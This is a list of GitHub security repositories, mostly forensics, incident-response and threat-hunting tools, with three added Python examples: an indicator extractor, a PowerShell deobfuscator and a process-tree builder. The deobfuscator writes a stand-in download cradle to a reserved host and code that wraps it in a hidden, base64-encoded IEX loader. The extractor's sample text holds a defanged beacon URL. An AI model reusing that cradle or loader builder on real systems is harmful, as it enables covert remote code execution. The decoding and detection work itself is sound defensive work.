github-watchman (60 stars): Monitoring GitHub for sensitive data shared publicly
hashlookup-forensic-analyser (43 stars): Analyse a forensic target (such as a directory) to find and report files found and not found in the CIRCL hashlookup public service - https://circl.lu/services/hashlookup/
Detectionlab (3,237 stars): Automate the creation of a lab environment complete with security tooling and logging best practices
Lolbas (1,506 stars): Living Off The Land Binaries and Scripts (LOLBins and LOLScripts)
ad-privileged-audit (42 stars): Provides various Windows Server Active Directory (AD) security-focused reports
Lolbas (3,810 stars): Living Off The Land Binaries and Scripts (LOLBins and LOLScripts)
Oriana (152 stars): Oriana is a threat hunting tool that leverages a subset of Windows events to build relationships, calculate totals and run analytics. The results are presented in a web layer to help defenders identify outliers and suspicious behavior in corporate environments.
Vast (227 stars): 🔮 Visibility Across Space and Time
Timesketch (1,795 stars): Collaborative forensic timeline analysis
Packrat (16 stars): Live system forensic collector
Malwless (215 stars): Test Blue Team detections without running any attack
Malice (1,253 stars): VirusTotal Wanna Be - Now with 100% more Hipster
Thehive (2,300 stars): TheHive: a Scalable, Open Source and Free Security Incident Response Platform
Logontracer (1,914 stars): Investigate malicious Windows logons by visualizing and analyzing Windows event logs
Blue-Baron (23 stars): Automate creating resilient, disposable, secure and agile monitoring infrastructure for Blue Teams
Cacador (115 stars): Indicator Extractor
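What an indicator extractor such as Cacador does, as an added example written for this listing rather than Cacador's own code: refang the usual defanging conventions (hxxp://, evil[.]com, user[@]host), then match URLs, e-mail addresses, domains, IPv4 addresses and MD5/SHA-1/SHA-256 hashes. The report excerpt, the TLD list and every host name in it are constructed for the demonstration.

```python
"""Extract and refang common indicator types from free text.

Added example, not Cacador's code. Reports are usually pasted with defanged
indicators, so the text is refanged before matching. Hash patterns are
anchored on word boundaries so a SHA-256 is not also reported as an MD5 or
SHA-1 prefix. The TLD list is a constructed stub; a production tool would
load the public suffix list instead.
"""
import re
from typing import Dict, Set

_REFANG = [
    (re.compile(r"hxxp(s?)://", re.I), r"http\1://"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", re.I), "."),
    (re.compile(r"\[@\]|\(@\)|\[at\]", re.I), "@"),
]

_TLDS = r"(?:com|net|org|io|info|biz|ru|cn|xyz|top|onion)"   # constructed stub list
_PATTERNS = {
    "url": re.compile(r"\bhttps?://[^\s\"'<>]+", re.I),
    "email": re.compile(r"\b[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "domain": re.compile(r"\b(?:[a-z0-9-]+\.)+" + _TLDS + r"\b", re.I),
    "ipv4": re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
}

# Constructed report excerpt (not real telemetry); hosts are fictitious.
SAMPLE = """Constructed report excerpt:
Beacon to hxxp://evil[.]com/gate.php from 10.0.0.5 every 60s.
Dropper MD5 d41d8cd98f00b204e9800998ecf8427e, SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855.
Phishing sender: ops[@]badmail[.]ru
"""


def refang(text: str) -> str:
    """Undo the common defanging conventions so the indicator patterns match."""
    for pat, repl in _REFANG:
        text = pat.sub(repl, text)
    return text


def extract_iocs(text: str) -> Dict[str, Set[str]]:
    """Return {kind: set_of_indicators}; hashes and names are lower-cased, URLs kept as-is."""
    text = refang(text)
    found: Dict[str, Set[str]] = {}
    for kind, pat in _PATTERNS.items():
        hits = pat.findall(text)
        if kind == "url":
            hits = [u.rstrip(".,;:)]") for u in hits]   # strip sentence punctuation glued to the URL
        else:
            hits = [h.lower() for h in hits]
        found[kind] = set(hits)
    return found


if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE).items():
        print(f"{kind:7s} {sorted(values)}")
```

Domains that only appear inside a URL or an e-mail address are reported as domains too, which is what most analysts want when building a blocklist; filter against the `url` and `email` sets if that is not desired.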
Atc React (226 stars): A knowledge base of actionable Incident Response techniques
Awesome Forensics (1,775 stars): A curated list of awesome forensic analysis tools and resources
cytrone (72 stars): CyTrONE: Integrated Cybersecurity Training Framework
Sysmon Modular (1,229 stars): A repository of Sysmon configuration modules
Dfir Orc (202 stars): Forensics artefact collection tool for systems running Microsoft Windows
Lw Yara (78 stars): YARA ruleset for scanning Linux servers for shells, spamming, phishing and other webserver baddies
Mimir (63 stars): Smart OSINT collection of common IOC types
CCXDigger (45 stars): The CyberCX Digger project is designed to help Australian organisations determine if they have been impacted by certain high profile cyber security incidents. Digger provides threat hunting functionality packaged in a simple-to-use tool, allowing users to detect certain attacker activities; all for free.
Pypowershellxray (192 stars): Python script to decode common encoded PowerShell scripts
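The two encodings a decoder like Pypowershellxray has to peel most often, shown as an added example written for this listing (not Pypowershellxray's own code): the `-EncodedCommand` argument, which is base64 of the script as UTF-16LE, and a `[Convert]::FromBase64String(...)` blob fed through a `GzipStream` or `DeflateStream`. The sample command line is constructed by `build_sample()` inside the block; the inner script and the `example.invalid` host are not real.

```python
"""Peel the common encoding layers off a PowerShell one-liner.

Added example, not Pypowershellxray's code. Two layers are recognised and
unwrapped repeatedly until neither applies:
  1. -EncodedCommand (or any prefix such as -e, -enc) followed by base64 of
     the script as UTF-16LE, which is what powershell.exe expects;
  2. [Convert]::FromBase64String('...') whose bytes go into a GzipStream or
     a DeflateStream (.NET DeflateStream is raw deflate, hence wbits=-15).
"""
import base64
import gzip
import re
import zlib
from typing import List

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
_ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|encodedcom|"
    r"encodedcomm|encodedcomma|encodedcomman|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
    re.I,
)
_B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)

# Constructed payload; example.invalid is a reserved, non-resolving name.
INNER_SCRIPT = "$c = New-Object System.Net.WebClient; $c.DownloadString('http://example.invalid/stage2')"


def _bytes_to_text(raw: bytes) -> str:
    # UTF-16LE script text shows as "x\x00y\x00"; anything else is treated as UTF-8.
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def _inflate(blob: bytes, context: str) -> bytes:
    """Decompress according to the stream class named next to the base64 call."""
    if re.search(r"GzipStream", context, re.I):
        return gzip.decompress(blob)
    if re.search(r"DeflateStream", context, re.I):
        return zlib.decompress(blob, -15)   # raw deflate, no zlib header
    return blob


def decode_layers(command: str, max_depth: int = 10) -> List[str]:
    """Return [command, layer1, layer2, ...]; the last element is the innermost script."""
    layers = [command]
    for _ in range(max_depth):
        current = layers[-1]
        m = _ENC_FLAG.search(current)
        if m:
            layers.append(base64.b64decode(m.group(1)).decode("utf-16le", errors="replace"))
            continue
        m = _B64_CALL.search(current)
        if m:
            layers.append(_bytes_to_text(_inflate(base64.b64decode(m.group(1)), current)))
            continue
        break
    return layers


def build_sample(script: str = INNER_SCRIPT, compression: str = "gzip") -> str:
    """Constructed sample: script -> compressed+base64 loader -> -enc UTF-16LE base64."""
    if compression == "gzip":
        blob = gzip.compress(script.encode())
    else:
        co = zlib.compressobj(wbits=-15)            # raw deflate, as .NET DeflateStream writes it
        blob = co.compress(script.encode()) + co.flush()
    stream = "GzipStream" if compression == "gzip" else "DeflateStream"
    loader = (
        "IEX (New-Object IO.StreamReader((New-Object IO.Compression." + stream + "("
        "[IO.MemoryStream][Convert]::FromBase64String('" + base64.b64encode(blob).decode() + "'),"
        "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
    )
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(loader.encode("utf-16le")).decode()


if __name__ == "__main__":
    for i, layer in enumerate(decode_layers(build_sample())):
        print(f"--- layer {i} ---\n{layer[:120]}")
```

Real samples add further wrappers (string reversal, `-join` of char arrays, `Invoke-Expression` aliases such as `iex` or `&$x`), which is why the loop is bounded by `max_depth` and stops as soon as no known layer matches rather than guessing.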
Scripting (47 stars): PS / Bash / Python / Other scripts For FUN!
Zombieant (169 stars): Zombie Ant Farm: Primitives and Offensive Tooling for Linux EDR evasion
Loki (2,217 stars): Loki - Simple IOC and Incident Response Scanner
TheHiveHooks (22 stars): Python tool that makes working with TheHive webhooks easier
Thehive4py (143 stars): Python API client for TheHive
Dfirtrack (232 stars): DFIRTrack - The Incident Response Tracking Application
Mthc (134 stars): All-in-one bundle of MISP, TheHive and Cortex
Cirtkit (117 stars): Tools for the Computer Incident Response Team 💻
Threathunter Playbook (2,879 stars): A threat hunter's playbook to aid the development of techniques and hypotheses for hunting campaigns
pyarascanner (23 stars): A simple many-rules to many-files YARA scanner for incident response or malware zoos
Historicprocesstree (46 stars): An Incident Response tool that visualizes historic process execution evidence (based on Event ID 4688 - Process Creation Event) in a tree view
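Rebuilding a historic process tree from 4688 records, as an added example written for this listing rather than Historicprocesstree's own code. The point a practitioner cares about is PID reuse: Windows hands out process IDs again after a process exits, so the creator PID in a 4688 event must be resolved to the process that most recently started with that PID before the event, not to the first one seen. The event records, the image paths and the Office-to-shell lineage check are all constructed for the demonstration.

```python
"""Rebuild a historic process tree from Security event 4688 records.

Added example, not Historicprocesstree's code. Each record is a constructed
dict holding the 4688 fields that matter for lineage: NewProcessId, the
creator's ProcessId (both hex strings, as in the event XML), NewProcessName,
the command line and the event time. PIDs are reused, so the "live" table is
overwritten on every 4688 and later children attach to the newer process.
"""
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Optional


@dataclass
class Proc:
    pid: int
    image: str
    cmdline: str
    time: str
    parent: Optional["Proc"] = None
    children: List["Proc"] = field(default_factory=list)

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1]


# Constructed 4688 records (not real telemetry). Note that PID 0x2b10 is reused.
EVENTS = [
    {"time": "2024-01-01T10:00:00", "new_pid": "0x1000", "creator_pid": "0x400",
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"time": "2024-01-01T10:00:05", "new_pid": "0x1a2c", "creator_pid": "0x1000",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n invoice.docm'},
    {"time": "2024-01-01T10:00:30", "new_pid": "0x2b10", "creator_pid": "0x1a2c",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c powershell -nop -w hidden"},
    {"time": "2024-01-01T10:00:31", "new_pid": "0x2c44", "creator_pid": "0x2b10",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden"},
    {"time": "2024-01-01T10:05:00", "new_pid": "0x2b10", "creator_pid": "0x1000",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", "cmdline": "msedge.exe"},
    {"time": "2024-01-01T10:05:02", "new_pid": "0x3000", "creator_pid": "0x2b10",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": "msedge.exe --type=renderer"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_tree(events: List[dict]) -> List[Proc]:
    """Replay 4688 events in time order; returns the root processes (creator not in the log)."""
    live: Dict[int, Proc] = {}      # pid -> most recent process started with that pid
    roots: List[Proc] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        pid = int(ev["new_pid"], 16)
        parent = live.get(int(ev["creator_pid"], 16))   # None if the creator predates the log
        node = Proc(pid, ev["image"], ev["cmdline"], ev["time"], parent)
        (parent.children if parent else roots).append(node)
        live[pid] = node            # overwrite on reuse so later children attach to the new process
    return roots


def walk(nodes: List[Proc]) -> Iterator[Proc]:
    """Pre-order traversal of the tree."""
    for n in nodes:
        yield n
        yield from walk(n.children)


def ancestry(node: Proc) -> List[str]:
    """Image names from the root down to this process."""
    chain = []
    while node is not None:
        chain.append(node.name)
        node = node.parent
    return chain[::-1]


def office_spawned_shells(roots: List[Proc]) -> List[List[str]]:
    """Lineages in which a shell or script host has an Office application among its ancestors."""
    hits = []
    for n in walk(roots):
        chain = ancestry(n)
        if n.name.lower() in SHELLS and any(a.lower() in OFFICE for a in chain[:-1]):
            hits.append(chain)
    return hits


def render(nodes: List[Proc], depth: int = 0) -> str:
    """Indented text view of the tree, one process per line."""
    out = []
    for n in nodes:
        out.append(f"{'  ' * depth}{n.name} (pid {n.pid:#x}, {n.time}) {n.cmdline}")
        out.append(render(n.children, depth + 1))
    return "\n".join(s for s in out if s)


if __name__ == "__main__":
    tree = build_tree(EVENTS)
    print(render(tree))
    for chain in office_spawned_shells(tree):
        print("ALERT office->shell:", " > ".join(chain))
```

Feeding 4689 (process exit) events into the same loop, deleting `live[pid]` on exit, makes the reuse resolution exact rather than relying on creation order alone; with 4688 only, a child logged between a parent's exit and the PID's reuse is still attributed to the old process.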
Kiewtai (108 stars): A port of Kaitai to the Hiew hex editor
Userline (221 stars): Query and report user logon relations from MS Windows Security Events
Threathunt (92 stars): ThreatHunt is a PowerShell repository that allows you to train your threat hunting skills
Slides (203 stars): Misc Threat Hunting Resources
Signature Base (1,212 stars): Signature base for my scanner tools
EventTranscript.db-Research (33 stars): A repo for centralizing ongoing research on the new Windows 10/11 DFIR artifact, EventTranscript.db
Etl Parser (66 stars): Event Trace Log file parser in pure Python
Pockint (196 stars): A portable OSINT Swiss Army Knife for DFIR/OSINT professionals 🕵️
Autotimeliner (54 stars): Automagically extract a forensic timeline from a volatile memory dump
ezEmu (89 stars): See adversary, do adversary: Simple execution of commands for defensive tuning/research (now with more ELF on the shelf)
Yeti (1,037 stars): Your Everyday Threat Intelligence
Linuxforensics (189 stars): Everything related to Linux Forensics
assisted-log-enabler-for-aws (167 stars): Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn logging on
Malcom (988 stars): Malcom - Malware Communications Analyzer
Whids (188 stars): Open Source EDR for Windows
Beagle (976 stars): Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs
Forensic Tools (27 stars): CIRCL system forensic tools, a collection of tools to support forensic work
Misp Warninglists (184 stars): Warning lists to inform users of MISP about potential false positives or other information in indicators
zeek-docs (41 stars): Documentation for Zeek
NIST-to-Tech (61 stars): An open-source listing of cybersecurity technology mapped to the NIST Cybersecurity Framework (CSF)